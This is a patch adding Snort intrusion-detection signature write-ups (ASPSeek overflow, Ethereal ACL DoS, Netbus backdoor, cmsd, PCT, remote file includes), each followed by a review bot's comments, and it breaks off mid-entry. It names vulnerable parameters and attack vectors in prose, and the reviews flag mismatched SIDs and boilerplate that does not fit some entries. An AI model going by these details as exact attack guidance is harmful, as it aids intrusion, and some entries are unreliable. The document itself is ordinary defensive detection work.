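Review bot: the Attack Scenarios direction is internally inconsistent: it says the attacker sets up "a tftp service to transfer files back to the attacking system", which would make the compromised HOME_NET host the client and source of the transfer, yet then states "the source address will point to the attack network and the destination address will be an address defined in the HOME_NET". Clarify which host runs the TFTP server; only an attacker issuing a GET against a server on the HOME_NET host matches the stated direction and this rule's GET request match. Typos: "transfering" (twice) should be "transferring", "for TFTP improperly configured TFTP servers" repeats "TFTP", "users names" should be "user names", "setup" should be "set up". "Additional References" lacks the trailing colon used elsewhere, the Affected Systems section is missing, and the contributor e-mail address is not in angle brackets like the others.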
--- /dev/null
+++ b/doc/signatures/804.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+804
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer 
+overflow vulnerability in SWSoft ASPSeek search engine software.
+
+--
+Impact:
+Arbitrary code execution.
+
+--
+Detailed Information:
+SWSoft ASPSeek search engine software contains a buffer overflow 
+vulnerability where, if a sufficiently long string is sent to the s.cgi 
+script using the template (tmpl) variable, a buffer overflow condition 
+can occur. This may allow the execution of arbitrary code. 
+
+--
+Affected Systems:
+All Apache web servers running SWSoft ASPSeek 1.0.3 and earlier are 
+vulnerable.
+
+--
+Attack Scenarios:
+An attacker can send a crafted query to the s.cgi script, creating a 
+buffer overflow condition. This could then allow the attacker to execute
+arbitrary code from the system's command shell.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+If a legitimate remote user accesses s.cgi where the "tmpl" variable is 
+invoked, this rule may generate an event.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to SWSoft ASPSeek 1.04 or later.
+
+--
+Contributors:
+Original rule writer unknown
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Sourcefire Technical Publications Team
+
+--
+Additional References:
+
+Bugtraq
+http://www.securityfocus.com/bid/2492
+
+CVE
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-0476
+
+--
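Review bot: Affected Systems says "ASPSeek 1.0.3 and earlier" while Corrective Action says "Upgrade to SWSoft ASPSeek 1.04 or later"; the two version formats (1.0.3 vs 1.04) disagree and one is presumably a typo, so they should be made consistent. Affected Systems also restricts the issue to "All Apache web servers", but nothing in Detailed Information ties the s.cgi overflow to Apache; either state why Apache is relevant or generalize to any web server running ASPSeek. The False Positives note could add that the rule keys on the length of the "tmpl" value, since a legitimate short request with that variable would otherwise appear to be flagged.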
--- /dev/null
+++ b/doc/signatures/3055.txt
@@ -0,0 +1,64 @@
+Rule: 
+
+--
+Sid: 
+3055
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Ethereal.
+
+-- 
+Impact: 
+Serious. Denial of Service (DoS).
+
+--
+Detailed Information:
+Ethereal is a multi-platform network protocol analyser capable of
+displaying network data to the user in a graphical user interface.
+
+An error in the processing of access control lists (ACLs) concerning the
+size of the access control entries (ACEs) may lead to a Denial of Service
+(DoS) condition in Ethereal. The ACL parsing routine trusts the size of
+the ACE given in the packet during processing. If a sufficiently large ACL
+structure is supplied combined with a specified ACE size of 0, it is
+possible to cause the DoS condition to occur.
+
+--
+Affected Systems:
+	Ethereal 0.10.7 and prior
+
+--
+Attack Scenarios: 
+An attacker needs to craft packet data containing large NT ACLs, the
+attacker then needs to specify one of the ACEs as having a size of 0.
+
+-- 
+Ease of Attack: 
+Moderate.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
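Review bot: Attack Scenarios mentions "large NT ACLs" but Detailed Information never names the protocol dissector in Ethereal that parses the ACL/ACE structures, so readers cannot tell what traffic the rule inspects; state which dissector and protocol carries the ACL. Additional References is empty despite a precise affected version (Ethereal 0.10.7 and prior); cite the Ethereal advisory or CVE for the ACE size handling issue. Minor: "Apply the appropriate vendor supplied patch" lacks a full stop, and "None Known" should match "None known." used elsewhere.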
--- /dev/null
+++ b/doc/signatures/3115.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+3115
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft License Logging Service.
+
+-- 
+Impact: 
+Serious. Execution of arbitrary code leading to unauthorized
+administrative access to the target host. Denial of Service (DoS) is
+also possible.
+
+--
+Detailed Information:
+Microsoft License Logging Service is used to manage licenses for
+Microsoft server products.
+
+A vulnerability in the service exists due to a programming error such
+that an unchecked buffer may present an attacker with the opportunity to
+exploit the service and run code of their choosing on an affected
+system. The attacker may then cause a DoS condition in the service or
+possibly gain administrative access to the target host.
+
+The unchecked buffer exists when processing the length of messages sent
+to the logging service.
+
+--
+Affected Systems:
+	Microsoft Windows Server 2003
+	Microsoft Windows Server 2000
+	Microsoft Windows NT Server
+
+--
+Attack Scenarios: 
+An attacker can supply extra data in the message to the service
+containing code of their choosing to be run on the server.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+-- 
+
+Corrective Action: 
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
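Review bot: this document is word-for-word identical to 3111.txt earlier in the patch, down to the stray blank line between "--" and "Corrective Action:" and the trailing spaces on separator lines. Two separate SIDs need to explain how their detection differs (for example what each rule matches in the License Logging Service message), otherwise an analyst seeing both events cannot tell why both fire. Additional References is empty for a known vulnerability with vendor supplied patches; cite the vendor bulletin.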
--- /dev/null
+++ b/doc/signatures/100000384.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000384
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Ottoman" application running on a webserver. Access to the file "index.php" using a remote file being passed as the "default_path" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "default_path" parameter in the "index.php" script used by the "Ottoman" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Ottoman
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
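Review bot: the credential-validation paragraph in Detailed Information does not apply to a remote file include via the "default_path" parameter of index.php and should be replaced with a description of what the rule matches (a remote URL in that parameter). "ona" should be "on a", "attackers choosing" needs an apostrophe, and "an exploitation attempt has been attempted" is redundant. Ease of Attack claims "Exploits exist" while Additional References is empty; cite the source advisory.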
--- /dev/null
+++ b/doc/signatures/1626.txt
@@ -0,0 +1,79 @@
+Rule:
+
+--
+Sid: 1626
+
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a potential 
+weakness on a host running Microsoft Internet Information Server (IIS). 
+
+--
+Impact:
+Information gathering possible administrator access.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit potential 
+weaknesses in a host running Microsoft IIS.
+
+The attacker may be trying to gain information on the IIS implementation
+on the host, this may be the prelude to an attack against that host 
+using that information.
+
+The attacker may also be trying to gain administrator access to the 
+host, garner information on users of the system or retrieve sensitive 
+customer information.
+
+Some applications may store sensitive information such as database 
+connections, user information, passwords and customer information in 
+files accessible via a web interface. Care should be taken to ensure 
+these files are not accessible to external sources.
+
+--
+Affected Systems:
+Any host using IIS.
+
+--
+Attack Scenarios:
+An attacker can retrieve a sensitive file containing information on the 
+IIS implementation. The attacker might then gain administrator access to
+the site, deface the content or gain access to a database.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the IIS implementation on the host. Ensure all measures have been 
+taken to deny access to sensitive files.
+
+Ensure that the IIS implementation is fully patched.
+
+Ensure that the underlying operating system is fully patched.
+
+Employ strategies to harden the IIS implementation and operating system.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
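Review bot: Detailed Information never says what the rule matches (which file or request pattern against IIS), even though Attack Scenarios says an attacker "can retrieve a sensitive file"; name the resource so the False Positives claim of "None Known." can be judged. "Sid: 1626" is on one line while every other document places the number on its own line after "Sid:"; normalize. "Information gathering possible administrator access." is missing punctuation and should read "Information gathering. Possible administrator access." Additional References is empty.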
--- /dev/null
+++ b/doc/signatures/144.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+144
+
+--
+Summary:
+This event is generated when an FTP login by user "w0rm" was attempted. 
+This is an account used by the ADMw0rm-v1 worm.
+
+--
+Impact:
+Infected systems are left with a backdoor user account named 
+"w0rm" and an email with the victims ip address is emailed to the worms 
+creators.
+
+--
+Detailed Information:
+This worm exploits a vulnerability in BIND version 4.9.6 and is linux 
+specific. These attempts mean the box has probably already been 
+compromised.
+
+--
+Affected Systems:
+	Default installations of RedHat 4.0 to 5.2
+
+--
+Attack Scenarios:
+Standard Internet worm.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade BIND on vulnerable servers.
+
+--
+Contributors:
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Josh Sakofsky
+-- 
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS01
+
+--
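Review bot: Corrective Action ("Upgrade BIND on vulnerable servers.") only prevents new infections; Detailed Information says these login attempts mean the host "has probably already been compromised", so the action should also cover removing the "w0rm" backdoor account and checking the host for further changes. Grammar: "was attempted" should be "is attempted", "victims ip address" should be "victim's IP address", "worms creators" should be "worm's creators", and "linux" should be "Linux". The blank line before the separator after the Contributors block is missing and that separator has a trailing space.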
--- /dev/null
+++ b/doc/signatures/100000432.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000432
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "BlueShoes" application running on a webserver. Access to the file "file.php" using a remote file being passed as the "APP[path][core]" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "APP[path][core]" parameter in the "file.php" script used by the "BlueShoes" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using BlueShoes
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
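Review bot: the credential-validation paragraph in Detailed Information does not describe a remote file include via the "APP[path][core]" parameter of file.php and should be replaced with what the rule matches (a remote URL in that parameter). "ona" should be "on a", "attackers choosing" needs an apostrophe, "an exploitation attempt has been attempted" is redundant, and the Sid and Affected Systems blocks lack the blank line before "--". Ease of Attack says "Exploits exist" but Additional References is empty; cite the advisory.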
--- /dev/null
+++ b/doc/signatures/111.txt
@@ -0,0 +1,78 @@
+
+--
+Rule:
+--
+Sid:111
+
+--
+Summary:
+This event is generated when an attacker is connected to a Netbus trojan
+and issues the command 'getinfo'
+
+--
+Impact:
+Possible theft of data and control of the targeted machine leading to a
+compromise of all resources the machine is connected to.
+
+--
+Detailed Information:
+The Netbus program is a backdoor designed for Windows. It allows anyone 
+who knows the listening port number and password to remotely control the
+host.  Intruders access the server using either a text or graphics based
+client. 
+
+The backdoor program allows the remote user to execute commands, list
+files, start silent services, share directories, upload and download
+files, manipulate the registry, kill processes, list processes, as well
+as other options, as well as open/close the CD-ROM drive, send
+interactive dialogs to chat with the compromised system, listen to the
+system's microphone (if it has one), and a few other features. 
+
+--
+Affected Systems:
+	Windows 95
+	Windows 98
+	Windows NT
+	Windows 2000
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. This
+event is indicative of an existing infection being activated. Initial
+compromise may be due to the exploitation of another vulnerability and
+the attacker is leaving another way into the machine for further use.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised.
+
+--
+False Positives:
+Security tool probing for netbus
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow Telnet access to port 12345 from external sources.
+
+Use SSH as opposed to Telnet for access from external locations
+
+Delete the Trojan and kill any associated processes.
+
+--
+Contributors:
+Original rule writer unknown
+Snort documentation contributed by John Liss
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+NTsecurity.net
+http://www.ntsecurity.net/
+
+--
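Review bot: Corrective Action refers to "Telnet access to port 12345" and recommends "Use SSH as opposed to Telnet", but Detailed Information describes Netbus clients connecting to the backdoor, not Telnet; the advice should be to block inbound access to the Netbus listening port named here (12345) from external sources and to remove the backdoor, and the SSH line should be dropped as irrelevant. Layout: the leading "--" before "Rule:" and "Sid:111" without a space or line break diverge from the other documents. The second Detailed Information paragraph repeats "as well as other options, as well as"; tidy the list. The Summary lacks a full stop, and "netbus" in False Positives should be capitalized as "Netbus" like elsewhere.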
--- /dev/null
+++ b/doc/signatures/1184.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1184
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
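Review bot: the Summary and Detailed Information for sid 1184 are generic boilerplate ("a known vulnerability on a web server or a web application resident on a web server") and never say which request, URI or pattern this rule matches, so an analyst reading the alert cannot tell what was detected; the identical text is reused verbatim for sid 1064 (doc/signatures/1064.txt) later in this patch. Suggest adding one sentence to Summary naming the specific request the rule looks for, and trimming the generic third paragraph of Detailed Information if it does not apply. Minor: "the attackers choosing" should read "the attacker's choosing" (this recurs in many files in the patch).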
--- /dev/null
+++ b/doc/signatures/2108.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+2108
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer
+overflow condition in the Post Office Protocol (POP) command CAPA.
+
+--
+Impact:
+Possible remote execution of arbitrary code leading to a remote root 
+compromise.
+
+--
+Detailed Information:
+A vulnerability exists such that an attacker may overflow a buffer by
+sending multiple line feed characters to a POP server via the CAPA command.
+
+--
+Attack Scenarios:
+Simple.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+ZVON RFC Reference:
+http://www.zvon.org/tmRFC/RFC2449/Output/chapter5.html
+
+Gordano Knowledge Base:
+http://www.ntmail.co.uk/kb.htm?q=981
+
+ZVON RFC Reference:
+http://www.zvon.org/tmRFC/RFC2449/Output/chapter6.html
+
+--
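Review bot: this file has no Affected Systems section, which every other signature doc in the patch carries, and the Gordano Knowledge Base reference is the only hint at which POP server is meant; suggest adding an explicit "Affected Systems:" block naming the vulnerable product and versions. Also, Attack Scenarios reads "Simple.", which is an ease-of-attack rating rather than a scenario; the scenario is already stated in Detailed Information ("sending multiple line feed characters to a POP server via the CAPA command") and could simply be repeated there. Minor: the two "ZVON RFC Reference:" entries (chapter5 and chapter6) could be listed under a single heading.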
--- /dev/null
+++ b/doc/signatures/2300.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid:
+2300
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in the PHP web application Proxy2.de Advanced Poll 2.0.2
+running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt may have been made to exploit a
+known vulnerability in the PHP application Proxy2.de Advanced Poll
+2.0.2. This application does not perform stringent checks when handling
+user input, this may lead to the attacker being able to execute PHP
+code, include php files and possibly retrieve sensitive files from the
+server running the application.
+
+--
+Affected Systems:
+	All systems running Proxy2.de Advanced Poll 2.0.2
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying PHP script.
+
+--
+Ease of Attack:
+Simple. No exploit code is required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
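Review bot: the Attack Scenarios paragraph ("An attacker can access an authentication mechanism and supply his/her own credentials to gain access.") is the generic CGI boilerplate and does not match this file's Detailed Information, which describes a PHP code execution, file inclusion and file retrieval flaw caused by unchecked user input in Advanced Poll 2.0.2; suggest replacing it with a scenario built from that description, e.g. "An attacker supplies crafted input to a vulnerable script to include PHP files or read files from the server." Minor: "the attackers choosing" should read "the attacker's choosing".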
--- /dev/null
+++ b/doc/signatures/1910.txt
@@ -0,0 +1,70 @@
+Rule:
+
+Sid:
+1909
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer
+overflow associated with the Remote Procedure Call (RPC) Calendar
+Manager Service daemon, cmsd.
+
+--
+Impact:
+Remote root access. The attack may allow execution of arbitrary commands
+with the privileges of root.
+
+--
+Detailed Information:
+The cmsd RPC service implements the Calendar Manager Service daemon that
+is often distributed with the Common Desktop Environment (CDE) and Open
+Windows. The Calendar Manager daemon provides appointment and scheduling
+functions for CDE. A buffer overflow exists in the rtable_insert()
+function because of improper bounds checking, allowing the execution of
+arbitrary commands with the privileges of root.  One possible exploit
+vector is by inserting appointments into the Calendar Manager database.
+ 
+--
+Affected Systems:
+	SCO Open UNIX 8.0
+	SCO UnixWare 7.1.1
+	HP-UX 10.20, 10.24, 10.30, 11.0
+	Sun Solaris 2.3, 2.4, 2.5, 2.5.1, 2.6, 7.0
+	Sun SunOS 4.1.3, 4.1.4
+
+--
+Attack Scenarios:
+The attacker can use the exploit code to overflow the buffer allowing
+execution of arbitrary commands with the privileges of root.
+
+--
+Ease of Attack:
+Simple. Exploit code is freely available.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to
+RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+--
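Review bot: the Sid in the body ("+Sid:" / "+1909") does not match the file name doc/signatures/1910.txt; one of the two is wrong and the mismatch will mislead anyone looking up the alert by number. Also, this file omits the "--" separator line between "Rule:" and "Sid:" that every other file in the patch has, which may break tooling that splits these documents on "--" lines. Minor: "Open Windows" in Detailed Information should be "OpenWindows", the Sun product name.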
--- /dev/null
+++ b/doc/signatures/2516.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+2516
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the Microsoft implementation of the Private
+Communications Transport (PCT) protocol.
+
+--
+Impact:
+Execution of arbitrary code. Unauthorized administrative access to an
+affected host.
+
+--
+Detailed Information:
+A vulnerability exists in the handling of PCT requests that
+can be manipulated to give an attacker the opportunity to execute
+arbitrary code of their choosing leading to a possible remote
+administrative compromize of an affected host.
+
+The condition exists because of poor error handling routines in the
+Microsoft Secure Sockets Layer (SSL) library.
+
+--
+Affected Systems:
+	Microsoft Windows NT, 2000, 2003 and XP systems using PCT
+
+--
+Attack Scenarios:
+An attcker needs to make a specially crafted PCT request to an affected system.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Disable the use of PCT
+
+--
+Contributors:
+Sourcefire Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
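Review bot: spelling errors in the body: "compromize" in Detailed Information should be "compromise", and "attcker" in Attack Scenarios should be "attacker". The two Corrective Action lines ("Apply the appropriate vendor supplied patches" and "Disable the use of PCT") lack terminal periods, and Additional References is empty although this is a vendor-documented Microsoft issue; suggest adding the Microsoft security bulletin that covers the PCT flaw so the reader can verify the affected versions listed.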
--- /dev/null
+++ b/doc/signatures/414.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+
+Sid:
+414
+
+--
+
+Summary:
+This event is generated when a network host generates an ICMP IPV6 Where-Are-You datagram with an undefined ICMP Code.
+
+--
+
+Impact:
+ICMP Type 33 datagrams are not expected network traffic.  Hosts generating ICMP Type 33 datagrams should be investigated for hostile activity.
+
+--
+
+Detailed Information:
+ICMP Type 33 is an undocumented extension to RFC 1812 and RFC 792.  Its current use it not defined by an approved RFC.  
+
+--
+
+Attack Scenarios:
+None known
+
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate this type of ICMP datagram.
+
+--
+
+False Positives:
+None known
+
+--
+
+False Negatives:
+None known
+--
+
+Corrective Action:
+Hosts generating ICMP Type 33 datagrams should be investigated for hostile activity.
+
+--
+
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+
+--
+
+Additional References:
+None
+
+
+--
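Review bot: the Summary says the rule fires on "an ICMP IPV6 Where-Are-You datagram with an undefined ICMP Code", but Detailed Information never states which code values are defined for Type 33, so the reader cannot tell what "undefined" means or when the rule triggers; suggest stating the expected code value(s) explicitly. Grammar: "Its current use it not defined by an approved RFC." should read "Its current use is not defined by an approved RFC." Formatting: the blank line before "--" is missing after "False Negatives:" / "None known", unlike the other sections of this file, and the Impact and Corrective Action sections repeat the same sentence verbatim.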
--- /dev/null
+++ b/doc/signatures/100000551.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+100000551
+--
+Summary:
+This event is generated when an attempt is made to access the file 
+"aolbonics.php which contains known vulnerabilities in the "Project Eros 
+BBSEngine" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to access a file with known 
+vulnerabilities from a remote machine used by the "Project Eros BBSEngine" 
+application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Project Eros BBSEngine
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
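Review bot: the Summary has an unbalanced quotation mark: "aolbonics.php which contains known vulnerabilities" should read "aolbonics.php" which contains known vulnerabilities. Detailed Information's first paragraph is hard to parse ("access a file with known vulnerabilities from a remote machine used by the ... application"), and its third paragraph is the generic CGI credentials-validation boilerplate, which does not describe this file's issue; suggest keeping only the sentences specific to aolbonics.php. Typo: "ona web server" should be "on a web server". Formatting: the blank line before "--" is missing after the Sid, Affected Systems and Contributors sections, and there is a trailing blank line after the final "--", both inconsistent with the rest of the patch.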
--- /dev/null
+++ b/doc/signatures/1340.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+1340
+
+--
+Summary:
+Attempted tfp command access via web
+
+--
+Impact:
+Possible attempt to gain information using the Trivial File Transfer
+Protocol (tfp) to  access sensitive files on a webserver. It is also
+possible that an  attempt is being made to remotely boot or reboot a
+device using  tfp.
+
+--
+Detailed Information:
+This is an attempt to gain intelligence from sensitive system files on a
+webserver.  Tftp is a variation of the File Transfer Protocol that can
+be used to  transfer files from one host to another, one feature it has
+is that it  can be used to boot or reboot various network devices
+without authentication  being needed. The attacker could possibly gain
+information needed  for other attacks on the system, including the
+retrieval of password  files.
+
+--
+Attack Scenarios:
+The attacker can make a standard HTTP request that contains 'tfp' in the
+URI which can  then return requested files to an external server.
+
+--
+Ease of Attack:
+Simple HTTP request.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Webservers should not be allowed to view or execute files and binaries
+outside  of it's designated web root or cgi-bin. This command may also
+be requested  on a command line should the attacker gain access to the
+machine.  Non-essential binaries should be removed from a webserver once
+it is in  production.
+--
+Contributors:
+Sourcefire Research Team
+
+-- 
+Additional References:
+
+CERT
+http://www.cert.org/advisories/CA-1990-02.html
+
+--
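Review bot: the protocol name is inconsistent within the file: Summary, Impact and Attack Scenarios say "tfp" (and Impact expands it as "Trivial File Transfer Protocol (tfp)"), while Detailed Information says "Tftp". If the rule content matches the string "tftp", the three "tfp" occurrences are typos and the expansion should be "(tftp)"; if the rule really matches "tfp", the expansion is wrong. Either way please make the document match the rule content. Also: "outside  of it's designated web root" should be "outside of its designated web root"; the Corrective Action section starts with a stray blank line and is missing the blank line before its closing "--"; and the Detailed Information and Corrective Action paragraphs contain many double spaces that look like extraction residue.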
--- /dev/null
+++ b/doc/signatures/2435.txt
@@ -0,0 +1,62 @@
+Rule:  
+
+--
+Sid:
+2435
+
+--
+Summary:
+This event is generated when an attempt is made to access a file type
+that may be subject to a known vulnerability in Microsoft Windows Explorer.
+
+--
+Impact:
+Denial of Service (DoS) possible execution of arbitrary code.
+
+--
+Detailed Information:
+When processing Windows Extended Metafile Format (.emf) files, Windows
+Explorer sets a buffer size based on information in the header for the
+file. If a malformed header is sent, it may be possible for an attacker
